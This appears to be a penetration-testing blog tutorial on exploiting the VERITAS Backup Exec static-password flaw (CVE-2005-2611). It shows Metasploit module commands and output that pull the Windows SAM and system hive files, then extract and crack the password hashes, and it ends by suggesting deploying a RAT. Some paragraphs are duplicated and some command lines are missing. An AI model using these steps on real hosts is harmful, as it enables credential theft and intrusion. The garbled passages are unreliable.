By Tony Lee
Introduction
I recently saw the old gem on a pentest, but when trying to explain the attack process to a colleague I could not find a good article--thus, I think it is worth writing one.
The finding in question is picked up by Nessus as:
VERITAS Backup Exec Remote Agent Static Password Arbitrary File Download (CVE-2005-2611)
The description reads:
"The remote host is running a version of VERITAS Backup Exec Agent which is configured with a default root account. An attacker may exploit this flaw to retrieve files from the remote host."
At first, you may think so what... But if you can grab any file, why not grab a copy of the password hashes stored on disk? Fortunately for us, there is a process that can be followed.The finding in question is picked up by Nessus as:
VERITAS Backup Exec Remote Agent Static Password Arbitrary File Download (CVE-2005-2611)
The description reads:
"The remote host is running a version of VERITAS Backup Exec Agent which is configured with a default root account. An attacker may exploit this flaw to retrieve files from the remote host."
The major steps involved are:
- Grab the files
- Extract the files
- Crack the hashes
Grab the files
First we need to figure out which files we want to grab.
On a domain controller, domain hashes are found in NTDS.dit:
- C:\windows\ntds\NTDS.DIT
On a workstation, you might remember that local system password hashes reside within two places:
- C:\windows\system32\config
- C:\windows\repair
For this exercise, let's focus on the workstation since it will be more probable. The config directory contains a copy of the current hashes. The repair directory contains a copy of the hashes as of the last restore point. Since the restore point may be in the past and thus not current, why do we care about the repair directory? Well, if for some reason you cannot pull down the config directory (you get a 0 byte file or the exploit fails), try the repair directory. I have seen the exploit fail because the files are in use by the operating system. The repair directory may yield an account that still exists with a static password. The process is the same either way, so first try the config directory and if that fails, we will move to the repair directory. Now to the exploit...
We are fortunate that the exploit is already written for us and is available within Metasploit.
msf > use auxiliary/admin/backupexec/dump msf auxiliary(dump) > show options Module options (auxiliary/admin/backupexec/dump): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST no The local IP address to accept the data connection LPATH backupexec_dump.mtf yes The local filename to store the exported data LPORT no The local port to accept the data connection RHOST yes The target address RPATH C:\Windows\win.ini yes The remote filesystem path to download RPORT 10000 yes The target port Auxiliary action: Name Description ---- ----------- Download msf auxiliary(dump) > |
Start small by pulling the default file shown (win.ini). Thus, the only required parameter above that is currently not populated is RHOST, so let's set it. Assuming your target is 192.168.2.10, we would use the following:
msf auxiliary(dump) > set RHOST 192.168.2.10
RHOST => 192.168.2.10
|
If that is successful, go for gold.
[*] Attempting to retrieve c:\windows\system32\config [*] Sending magic authentication request... [*] Starting our data listener... [*] Sending data connection request... [*] Waiting for the data connection... [*] Sending transfer parameters... [*] Sending backup request... [*] Sending environment request... [*] Transferring data... [*] Transferred 62194541 bytes. [*] Auxiliary module execution completed msf auxiliary(dump) > |
If all goes well, the file should not be a zero byte file and you can start the extraction. If this fails or it a zero byte file, change the directory to the repair directory (c:\windows\repair)
Extract the files
This step requires a Windows binary called ntbkup.exe to extract the files from the .mtf archive. It used to be available from www.fpns.net, but that site seems to have changed hands. If you want a known clean copy, message me and I will provide it free of charge. Otherwise, feel free to obtain it from a slightly less reputable source at your own risk.
The syntax for the extraction is:
This is what it will look like for a successful extraction:
NTBKUP Ver 1.07c compiled for WIN32 with MAX_PATH = 100 compiled for 64 bit file offsets Copyright (C) 2003 William T. Kranz NTBKUP comes with ABSOLUTELY NO WARRANTY Free software distributed under the terms of the GNU General Public license See http://www.gnu.org/licenses/gpl.html for license information Check http://www.fpns.net/willy/msbackup.htm for Updates & Documentation
--snip--
extracing: SAM:
data from 0x1d4166 to 0x28f808
length 767650 atrib 0x80 02/16/2010 02:07:13 PM
extracing: secsetup.inf:
data from 0x28fd32 to 0x2a2d32
length 77824 atrib 0x20 12/11/2012 06:13:32 PM
extracing: SECURITY:
data from 0x2a3162 to 0x2d589b
length 206649 atrib 0x80 02/16/2010 02:06:13 PM
extracing: setup.log:
data from 0x2d5d76 to 0x2e2f76
length 53760 atrib 0x20 12/11/2012 06:19:39 PM
extracing: smss.ASR:
data from 0x2e3132 to 0x195e132
length 23572480 atrib 0x20 12/11/2012 06:13:37 PM
extracing: software:
data from 0x195e52e to 0x1da152e
length 4468736 atrib 0x20 12/11/2012 06:13:44 PM
extracing: system:
data from 0x1da253a to 0x1da7cea
length 22448 atrib 0x20 02/27/2010 03:32:01 PM
--snip--
|
The most important two files contained above are the SAM file and the system file. I ignored most of the rest.
Crack the hashes
As mentioned previously, the most important files extracted are the SAM and system file. The SAM file in encrypted with a protection called syskey. The system file is used to decrypt the SAM file into hashes we can crack. There are many methods to crack this file, but here are two simple methods:
We are going to focus on using samdump2 because it is fast and native in Kali, but in case you are curious, here is a reference for instructions to use Cain and Abel: http://www.oxid.it/ca_um/topics/nt_hashes_dumper.htm
samdump2 is a very easy to use program and works great for this specific instance. Copy the SAM and system file over to your Kali host and use the following syntax:
That's it! Open hashes.txt with your favorite text editor (the right answer is vi) and view your trophy. Throw it into John the Ripper or a GPU cracker and you are in business. Hopefully a local administrator password will crack and you can use remote desktop or push your favorite RAT for further pillaging.
- Cain and Abel
- samdump2
We are going to focus on using samdump2 because it is fast and native in Kali, but in case you are curious, here is a reference for instructions to use Cain and Abel: http://www.oxid.it/ca_um/topics/nt_hashes_dumper.htm
samdump2 is a very easy to use program and works great for this specific instance. Copy the SAM and system file over to your Kali host and use the following syntax:
That's it! Open hashes.txt with your favorite text editor (the right answer is vi) and view your trophy. Throw it into John the Ripper or a GPU cracker and you are in business. Hopefully a local administrator password will crack and you can use remote desktop or push your favorite RAT for further pillaging.
Summary
We hope you enjoyed that blast from the past and found it useful. Again, reach out if you cannot find the ntbkup.exe binary from a legit source and I can email it to you. Thanks for reading and happy hacking!
Props
- Rapid7/Metasploit team: https://www.rapid7.com/db/modules/auxiliary/admin/backupexec/dump